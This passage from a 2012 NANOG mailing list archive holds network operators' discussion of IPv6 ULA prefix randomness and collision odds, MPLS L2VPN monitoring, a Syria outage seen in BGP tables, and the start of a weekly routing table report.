In-Reply-To: <009801cd6557$503c6d70$f0b54850$@gmail.com> References: <009801cd6557$503c6d70$f0b54850$@gmail.com> Message-ID: <20120719094159.GA13526@vacation.karoshi.com.> On Wed, Jul 18, 2012 at 10:36:31PM -0400, Chuck Church wrote: > I disagree. I see it as an extra layer of security. If DOD had a network > with address space 'X', obviously it's not advertised to the outside. It > never interacts with public network. Having it duplicated on the outside ----------------------------------- > world adds an extra layer of complexity to a hacker trying to access it. > It's not a be-all/end-all, but it's a plus. A hacker who's partially in the > network may try to access network 'X', but it routes to the outside world, > tripping IDSs... > > Chuck Never is a -very- long time. That said, -IF- DoD did authorize another party/contractor to utilize some DoD address blocks, its not clear if that LOA would be public. /bill From marka at isc.org Thu Jul 19 07:47:14 2012 From: marka at isc.org (Mark Andrews) Date: Thu, 19 Jul 2012 22:47:14 +1000 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 23:40:30 EST." References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> Message-ID: <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> In message , Jimmy Hess writes: > On 7/18/12, Karl Auer wrote: > > I don't understand the professed need for provable randomness. Without a > > number *space* to provide context, randomness is inherently > > non-provable. The whole point of the randomness of those 40 bits of ULA > > infix is that any number is as likely as any other number. Someone, > > When numbers are selected by choosing a random value; certain ratios > of bits set to "1" are more likely to occur than other ratios of bits > set to "1". > > A random generator that is operating correctly, is much more likely to > emit a number with 50% of the bits set to 1, than it is to emit a > number with 0% of the bits set to 1, given a sufficient number of > bits. If the ratio is inconsistent by a sufficient margin, and your > sample of the bits is large enough in number, you can show with high > confidence that the number is not random; a 1 in 10 billion chance > of the number being randomly generated, would be pretty convincing, > for example. Actually you can't. fdaa:aaaa:aaaa has 20/20 0/1 bits but is entirely non random. fdf0:f0f0:f0f0 has 20/20 0/1 bits but is entirely non random. The ratio of the number of bits doesn't tell you anything about whether the number was random or not. > Removing the temptation by excluding the small number of choices with > 90% - 95% of the bits set to 1 may eliminate future problems caused > by an early "accident"/"error" in assigning the initial ULA, > compared to the minor inconvenience of needing to run the ULA > generator one more time to get an actual usable range. > > > somewhere, is eventually going to get 10:0000:0000, someone else will > > eventually get 20:0000:0000 and so on. And they are just as likely to > > get them now as in ten years time. > > That is extremely improbable. > If you generate a million ULA IDs a day, every day, it is expected to > be over 1000 years before you generate one of those two. improbable != impossible > -- > -JH > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From cb.list6 at gmail.com Thu Jul 19 09:40:31 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Thu, 19 Jul 2012 07:40:31 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> Message-ID: If i may summarize this thread as a method to conclude it. 1. Some people like GUA the most. 2. Smart network operators understand the facts and make decisions based on facts (ULA exist, and it meets a need in some scenarios. NAT and lack of addresses are not reasons to use ULA). 3. Most FUD around ULA comes from an over-reaction to ipv4 NAT sins, misunderstandings about how security policy works in the real world , and deficiencies in mathmatical education. CB On Jul 19, 2012 5:48 AM, "Mark Andrews" wrote: > > In message < > CAAAwwbXh1wS_9aX4FwGrqmSBJmKGJ0nWHRi9EN53HtL36VhSSg at mail.gmail.com> > , Jimmy Hess writes: > > On 7/18/12, Karl Auer wrote: > > > I don't understand the professed need for provable randomness. Without > a > > > number *space* to provide context, randomness is inherently > > > non-provable. The whole point of the randomness of those 40 bits of ULA > > > infix is that any number is as likely as any other number. Someone, > > > > When numbers are selected by choosing a random value; certain ratios > > of bits set to "1" are more likely to occur than other ratios of bits > > set to "1". > > > > A random generator that is operating correctly, is much more likely to > > emit a number with 50% of the bits set to 1, than it is to emit a > > number with 0% of the bits set to 1, given a sufficient number of > > bits. If the ratio is inconsistent by a sufficient margin, and your > > sample of the bits is large enough in number, you can show with high > > confidence that the number is not random; a 1 in 10 billion chance > > of the number being randomly generated, would be pretty convincing, > > for example. > > Actually you can't. > > fdaa:aaaa:aaaa has 20/20 0/1 bits but is entirely non random. > fdf0:f0f0:f0f0 has 20/20 0/1 bits but is entirely non random. > > The ratio of the number of bits doesn't tell you anything about whether > the number was random or not. > > > Removing the temptation by excluding the small number of choices with > > 90% - 95% of the bits set to 1 may eliminate future problems caused > > by an early "accident"/"error" in assigning the initial ULA, > > compared to the minor inconvenience of needing to run the ULA > > generator one more time to get an actual usable range. > > > > > somewhere, is eventually going to get 10:0000:0000, someone else will > > > eventually get 20:0000:0000 and so on. And they are just as likely to > > > get them now as in ten years time. > > > > That is extremely improbable. > > If you generate a million ULA IDs a day, every day, it is expected to > > be over 1000 years before you generate one of those two. > > improbable != impossible > > > -- > > -JH > > > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > > From valdis.kletnieks at vt.edu Thu Jul 19 10:21:45 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Thu, 19 Jul 2012 11:21:45 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Thu, 19 Jul 2012 07:40:31 -0700." References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> Message-ID: <4612.1342711305@turing-police.cc.vt.edu> On Thu, 19 Jul 2012 07:40:31 -0700, Cameron Byrne said: > 3. Most FUD around ULA comes from an over-reaction to ipv4 NAT sins, > misunderstandings about how security policy works in the real world , and > deficiencies in mathmatical education. I'll add on that said security policies are *themselves* often based on misunderstandings. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From jason.iannone at gmail.com Thu Jul 19 11:35:39 2012 From: jason.iannone at gmail.com (Jason Iannone) Date: Thu, 19 Jul 2012 10:35:39 -0600 Subject: MPLS L2VPN monitoring In-Reply-To: <72A2F9AF18EC024C962A748EA6CF75B90EC2CDE0@W8USSFJ204.ams.gblxint.com> References: <72A2F9AF18EC024C962A748EA6CF75B90EC2CDE0@W8USSFJ204.ams.gblxint.com> Message-ID: We also use UNI NIDs that trap interface status, log interface and COS queue statistics, and respond to y.1731 traffic. On Tue, Jul 17, 2012 at 7:56 AM, Siegel, David wrote: > We deploy NIDs to the customer premise. You just can't get enough alarm data be looking only at your router/switch on your side of an Ethernet NNI to give you a proper indication of whether the service is functional, and it also happens to be quite handy to have when a performance test/verification is required. > > There are a variety of vendors out there to choose from...we have quite a lot of Tellabs and Accedian out in the field. > > I had hoped that last mile vendors would have been providing NIDs "smartjack" style by now in a fairly ubiquitous fashion, but alas none of them have stepped up to the plate so we're still putting them out there on our own dime. > > Dave > > -----Original Message----- > From: Peter Ehiwe [mailto:peterehiwe at gmail.com] > Sent: Tuesday, July 17, 2012 4:14 AM > To: North American Network Operators' Group > Subject: MPLS L2VPN monitoring > > Hello , > > For those who provide l2vpn services to customers over MPLS , what kind of tools do you use for monitoring the circuits and what kind of values do you proactively monitor > > I have tools in place to monitor these circuits but i want to know based on group members experiences in order to improve my monitoring platform for this circuits. > > Thanks a lot! > > From stephen at sprunk.org Thu Jul 19 12:19:38 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Thu, 19 Jul 2012 12:19:38 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718180735.GA11403@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> Message-ID: <500841AA.4020209@sprunk.org> On 18-Jul-12 13:07, Saku Ytti wrote: > On (2012-07-18 11:39 -0500), Stephen Sprunk wrote: >> Those were not considered requirements for the algorithm in RFC 4193 since there is no scenario /where RFC 4193 addresses are a valid solution in the first place/ for which testability or provability of the algorithm's results are important or even useful. > If collision occurs, if dispute occurs, provability that one party did not use BCP method can be useful to solve dispute and decide who renumbers. In my experience, pointing at RFCs is rarely how disputes are resolved in the real world. > Other potential problem with RFC, if you have software to generate two, if software runs parallel, it may generate same prefixes. It is incredibly unlikely, and that is all RFC 4193 claims to offer: /statistically /unique addresses. If you want /provably/ unique addresses, use GUAs--or lobby for ULA-C, which to date has been soundly rejected for lack of usefulness. > IEEE decided 2008 or 2009 to start allocation OUIs randomly, since some cheapskates were assigning themselves 'free' OUIs from end of the space, confident it'll never collide. So duplicate OUIs can happen. Also some NIC vendors ship with non-unique MAC. You'd still need two systems with duplicate MACs to run the algorithm at exactly the same timestamp, which IIRC has a resolution of 2^-32 seconds. > What makes RFC method good? RFC 4193 doesn't mandate any particular algorithm; it just provides an example that was designed to be easily implemented and used. You can use another RNG if you wish. S -- Stephen Sprunk "God does not play dice." --Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From stephen at sprunk.org Thu Jul 19 12:30:02 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Thu, 19 Jul 2012 12:30:02 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <1342670272.6281.646.camel@karl> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> Message-ID: <5008441A.8050207@sprunk.org> On 18-Jul-12 22:57, Karl Auer wrote: > I don't understand the professed need for provable randomness. I think his concern is that if an SP generates a ULA prefix for a customer, and that prefix happens to collide with someone else's ULA prefix, the SP may wish to prove that it was a true collision rather than a result of the SP's laziness or incompetence. However, that concern does /not/ apply to those interested in ULAs in general. For the very limited community it does apply to, use a provable RNG instead of the one in RFC 4193. S -- Stephen Sprunk "God does not play dice." --Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From stephen at sprunk.org Thu Jul 19 12:47:52 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Thu, 19 Jul 2012 12:47:52 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> Message-ID: <50084848.4080001@sprunk.org> On 19-Jul-12 07:47, Mark Andrews wrote: > In message , Jimmy Hess writes: >> When numbers are selected by choosing a random value; certain ratios of bits set to "1" are more likely to occur than other ratios of bits set to "1". >> >> A random generator that is operating correctly, is much more likely to emit a number with 50% of the bits set to 1, than it is to emit a number with 0% of the bits set to 1, given a sufficient number of bits. If the ratio is inconsistent by a sufficient margin, and your sample of the bits is large enough in number, you can show with high confidence that the number is not random; a 1 in 10 billion chance of the number being randomly generated, would be pretty convincing, for example. > Actually you can't. > > fdaa:aaaa:aaaa has 20/20 0/1 bits but is entirely non random. > fdf0:f0f0:f0f0 has 20/20 0/1 bits but is entirely non random. > > The ratio of the number of bits doesn't tell you anything about whether > the number was random or not. He oversimplified the real entropy test, which covers those cases. For a sufficiently long stream of random bits, there should be twice as many runs of length 1 as runs of length 2, twice as many runs of length 2 as runs of length 3, etc. And for each length, they should be evenly divided between runs of 0s and runs of 1s. Of course, 40 bits is nowhere near "sufficiently long", but you can score the entropy and set a lower bound for acceptability. The two examples above would get very low entropy scores, far below any sensible lower bound. >> That is extremely improbable. If you generate a million ULA IDs a day, every day, it is expected to be over 1000 years before you generate one of those two. > improbable != impossible All RFC 4193 ever claimed to offer was improbability. If that's not good enough, get a GUA from your RIR. S -- Stephen Sprunk "God does not play dice." --Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From valdis.kletnieks at vt.edu Thu Jul 19 13:29:14 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Thu, 19 Jul 2012 14:29:14 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 21:07:35 +0300." <20120718180735.GA11403@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> Message-ID: <18509.1342722554@turing-police.cc.vt.edu> On Wed, 18 Jul 2012 21:07:35 +0300, Saku Ytti said: > If collision occurs, if dispute occurs, provability that one party did not > use BCP method can be useful to solve dispute and decide who renumbers. Looking at actual numbers out of RFC4193: The following table shows the probability of a collision for a range of connections using a 40-bit Global ID field. Connections Probability of Collision 2 1.81*10^-12 10 4.54*10^-11 100 4.54*10^-09 1000 4.54*10^-07 10000 4.54*10^-05 OK? So even if you merge and re-merge, and go on a massive buying spree and accumulate a network where you have to interoperate 1,000 ULAs, you're *still* looking at a literally million-to-one shot. And if you only have a mess of 100 ULAs, it's a billion-to-one. Now, compare that to the chances that you'll acquire 2 companies, both of whom had an employee who didn't actually generate a proper random number, but did this sort of thing instead: http://www.spinics.net/lists/linux-driver-devel/msg26431.html A lot of people are worrying about the wrong problem. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From dmburgess at linktechs.net Thu Jul 19 13:43:11 2012 From: dmburgess at linktechs.net (Dennis Burgess) Date: Thu, 19 Jul 2012 13:43:11 -0500 Subject: Telus Wholesale NOC NUmber Message-ID: <50710E9A7E64454C974049FC998EB6555C6D5D@03-exchange.lti.local> Anyone got a number to Telus Wholesale? Got an issue with an PPPoE over L2TP setup. Dennis Burgess, Mikrotik Certified Trainer Author of "Learn RouterOS- Second Edition " Link Technologies, Inc -- Mikrotik & WISP Support Services Office: 314-735-0270 Website: http://www.linktechs.net - Skype: linktechs -- Create Wireless Coverage's with www.towercoverage.com - 900Mhz - LTE - 3G - 3.65 - TV Whitespace 5-Day Advanced RouterOS Workshop -- July 23rd 2012 - St. Louis, MO, USA 5-Day Advanced RouterOS Workshop - Oct 8th 2012 - St. Louis, MO, USA From saku at ytti.fi Thu Jul 19 14:11:02 2012 From: saku at ytti.fi (Saku Ytti) Date: Thu, 19 Jul 2012 22:11:02 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <18509.1342722554@turing-police.cc.vt.edu> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <18509.1342722554@turing-police.cc.vt.edu> Message-ID: <20120719191102.GA13703@pob.ytti.fi> On (2012-07-19 14:29 -0400), valdis.kletnieks at vt.edu wrote: > OK? So even if you merge and re-merge, and go on a massive buying spree and > accumulate a network where you have to interoperate 1,000 ULAs, you're *still* > looking at a literally million-to-one shot. And if you only have a mess of 100 ULAs, My point was, earlier in this thread 40b random method was suggested, which was deemed non RFC compliant. And I've viewed it superior to strictly RFC. But on later post, another author pointed out that 40b random is in conformance to the RFC. To me 40b random is simpler to implement and does not have either of the risks I described (however unlikely, why should I make implementation in given domain more complex and less strong) -- ++ytti From mysidia at gmail.com Thu Jul 19 19:30:25 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Thu, 19 Jul 2012 19:30:25 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> Message-ID: On 7/19/12, Mark Andrews wrote: > Actually you can't. > fdaa:aaaa:aaaa has 20/20 0/1 bits but is entirely non random. > fdf0:f0f0:f0f0 has 20/20 0/1 bits but is entirely non random. [snip] > The ratio of the number of bits doesn't tell you anything about whether > the number was random or not. [snip] Sure it does. A ratio of 1s to 0s of a sufficient deviation, is a sufficient but not a necessarily condition, for establishing that a sequence of binary numbers shown almost certainly was not chosen randomly. As for whether "fdf0:f0f0:f0f0" is a random number or not, I cannot say, not without a valid test for randomness on the sequence of bits that were chosen, and there are multiple appropriate tests available; use any reasonable test you like, they do exist, and 40 random bits is an amply large sample size. Despite that it is also definitely possible to manually construct strings that are not produced randomly, which nevertheless by design pass any specific test for randomness; intentional 'malice' cannot really be eliminated. However, there _are_ many non-random strings that exist which a 'lazy' or broken ULA ID generator might pick, that can be very easily detected as non-random with sufficient confidence, to tell the user "Hey, sorry, you can't use that. Please generate a new ULA ID". > improbable != impossible Improbable with a sufficiently small probability is equal to impossible intents and purposes. The probability of generating any specific decimal number you pick a priori, constructed out of 40 bits, is essentially zero, no matter what number you pick; there are _a very large number_ of possible ULA IDs you can exclude, before you have excluded enough that it actually matters.. Rejecting ULA IDs on equipment that have less than a 10^-11 chance of being a random sequence of bits; is less likely to reject a valid ID, than there is to be a collision on a ULA ID, and it would have a high probability of preventing future collisions caused by accident, misconfiguration, etc. Which means that it may be a large improvement on the "honor system" for picking ULA IDs with no verification. "The collision doesn't happen" is a better scenario than "I know who to blame.... the guy before me who just picked zero.. and some former employee in the other company that just picked a ULA ID of zero." -- -JH From kauer at biplane.com.au Thu Jul 19 20:07:17 2012 From: kauer at biplane.com.au (Karl Auer) Date: Fri, 20 Jul 2012 11:07:17 +1000 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> Message-ID: <1342746437.3052.49.camel@karl> On Thu, 2012-07-19 at 19:30 -0500, Jimmy Hess wrote: > > The ratio of the number of bits doesn't tell you anything about > > whether the number was random or not. > > Sure it does. A ratio of 1s to 0s of a sufficient deviation, is a > sufficient but not a necessarily condition, for establishing that a > sequence of binary numbers shown almost certainly was not chosen > randomly. A *sequence*, yes. A single number in isolation, no. Whether the bits within a single value are distributed randomly or not is irrelevant. You seem to be confusing the randomness of a sequence of bits (i.e., within a particular prefix) with the randomness of a sequence of prefixes. You have the entire bit sequence of a particular prefix available to inspect, so you can make a call on the randomness of the bits, but you do NOT have the entire prefix sequence, so CANNOT make a call on the randomness of the prefix. You can say, for a sufficient number of bits, whether the bits are distributed randomly. Agreed. But given a specific bit, without knowing the other bits, you cannot tell whether that specific bit was chosen randomly. If my prefix generating algorithm is to choose 39 bits completely randomly but always set bit 7, you cannot tell that bit 7 has been set non-randomly by inspecting only one prefix, because in a certain number of genuinely random prefixes, bit 7 will be set anyway. Maybe the one you happen to be looking at is such a one. The same is true of any two bits, and any three bits - and so on, all the way out to 40 bits. > However, there _are_ many non-random strings that exist which a > 'lazy' or broken ULA ID generator might pick, that can be very easily > detected as non-random with sufficient confidence, to tell the user > "Hey, sorry, you can't use that. Please generate a new ULA ID". You can pick them against human criteria; you can't pick them against mathematical criteria unless you have the sequence as well as the value. All zeros is exactly as likely as insert-any-prefix-here. But: IANAS (I Am Not A Statistician :-) so I think I'll stop now. I am either flogging a dead horse or digging an embarrassing hole for myself :-) Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From tvhawaii at shaka.com Thu Jul 19 22:10:53 2012 From: tvhawaii at shaka.com (Michael Painter) Date: Thu, 19 Jul 2012 17:10:53 -1000 Subject: Victory for Open WiFi Message-ID: <07F53F31A844480B89EF0B2B94FAA615@owner59e1f1502> >From the Electronic Frontier Foundation. https://www.eff.org/deeplinks/2012/07/judge-copyright-troll-cant-bully-internet-subscriber-bogus-legal-theory From gbonser at seven.com Fri Jul 20 00:00:48 2012 From: gbonser at seven.com (George Bonser) Date: Fri, 20 Jul 2012 05:00:48 +0000 Subject: Hearing Syria internet cut Message-ID: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com> Can anyone confirm? From gbonser at seven.com Fri Jul 20 00:42:29 2012 From: gbonser at seven.com (George Bonser) Date: Fri, 20 Jul 2012 05:42:29 +0000 Subject: Hearing Syria internet cut In-Reply-To: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com> Message-ID: <596B74B410EE6B4CA8A30C3AF1A155EA09E8908A@RWC-MBX1.corp.seven.com> I'm likely seeing some fallout from the earlier brief outage. > -----Original Message----- > From: George Bonser [mailto:gbonser at seven.com] > Sent: Thursday, July 19, 2012 10:01 PM > To: nanog at nanog.org > Subject: Hearing Syria internet cut > > Can anyone confirm? > > From andree+nanog at toonk.nl Fri Jul 20 01:21:21 2012 From: andree+nanog at toonk.nl (Andree Toonk) Date: Thu, 19 Jul 2012 23:21:21 -0700 Subject: Hearing Syria internet cut In-Reply-To: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E89040@RWC-MBX1.corp.seven.com> Message-ID: <5008F8E1.1070304@toonk.nl> .-- My secret spy satellite informs me that at 12-07-19 10:00 PM George Bonser wrote: > Can anyone confirm? Yes confirmed, about 90% of the Syrian prefixes disappeared from the BGP tables between 13:32 and 14:13 (UTC) earlier today (2012-07-19). Cheers, Andree From cscora at apnic.net Fri Jul 20 14:10:41 2012 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 21 Jul 2012 05:10:41 +1000 (EST) Subject: Weekly Routing Table Report Message-ID: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, LacNOG, TRNOG, CaribNOG and the RIPE Routing Working Group. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 21 Jul, 2012 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 418048 Prefixes after maximum aggregation: 176224 Deaggregation factor: 2.37 Unique aggregates announced to Internet: 203512 Total ASes present in the Internet Routing Table: 41560 Prefixes per ASN: 10.06 Origin-only ASes present in the Internet Routing Table: 33342 Origin ASes announcing only one prefix: 15690 Transit ASes present in the Internet Routing Table: 5589 Transit-only ASes present in the Internet Routing Table: 132 Average AS path length visible in the Internet Routing Table: 4.5 Max AS path length visible: 26 Max AS path prepend of ASN ( 36992) 22 Prefixes from unregistered ASNs in the Routing Table: 368 Unregistered ASNs in the Routing Table: 134 Number of 32-bit ASNs allocated by the RIRs: 3013 Number of 32-bit ASNs visible in the Routing Table: 2629 Prefixes from 32-bit ASNs in the Routing Table: 6809 Special use prefixes present in the Routing Table: 1 Prefixes being announced from unallocated address space: 168 Number of addresses announced to Internet: 2568092204 Equivalent to 153 /8s, 17 /16s and 250 /24s Percentage of available address space announced: 69.3 Percentage of allocated address space announced: 69.4 Percentage of available address space allocated: 99.9 Percentage of address space in use by end-sites: 93.0 Total number of prefixes smaller than registry allocations: 145304 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 102118 Total APNIC prefixes after maximum aggregation: 32802 APNIC Deaggregation factor: 3.11 Prefixes being announced from the APNIC address blocks: 102579 Unique aggregates announced from the APNIC address blocks: 42176 APNIC Region origin ASes present in the Internet Routing Table: 4719 APNIC Prefixes per ASN: 21.74 APNIC Region origin ASes announcing only one prefix: 1246 APNIC Region transit ASes present in the Internet Routing Table: 745 Average APNIC Region AS path length visible: 4.6 Max APNIC Region AS path length visible: 26 Number of APNIC region 32-bit ASNs visible in the Routing Table: 250 Number of APNIC addresses announced to Internet: 704482432 Equivalent to 41 /8s, 253 /16s and 140 /24s Percentage of available APNIC address space announced: 82.3 APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 131072-133119 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 152850 Total ARIN prefixes after maximum aggregation: 77506 ARIN Deaggregation factor: 1.97 Prefixes being announced from the ARIN address blocks: 153890 Unique aggregates announced from the ARIN address blocks: 68642 ARIN Region origin ASes present in the Internet Routing Table: 15199 ARIN Prefixes per ASN: 10.13 ARIN Region origin ASes announcing only one prefix: 5763 ARIN Region transit ASes present in the Internet Routing Table: 1606 Average ARIN Region AS path length visible: 4.1 Max ARIN Region AS path length visible: 24 Number of ARIN region 32-bit ASNs visible in the Routing Table: 16 Number of ARIN addresses announced to Internet: 1071726976 Equivalent to 63 /8s, 225 /16s and 65 /24s Percentage of available ARIN address space announced: 56.7 ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 7723-8191, 10240-12287, 13312-15359, 16384-17407 18432-20479, 21504-23551, 25600-26591, 26624-27647, 29696-30719, 31744-33791 35840-36863, 39936-40959, 46080-47103 53248-55295, 393216-394239 ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 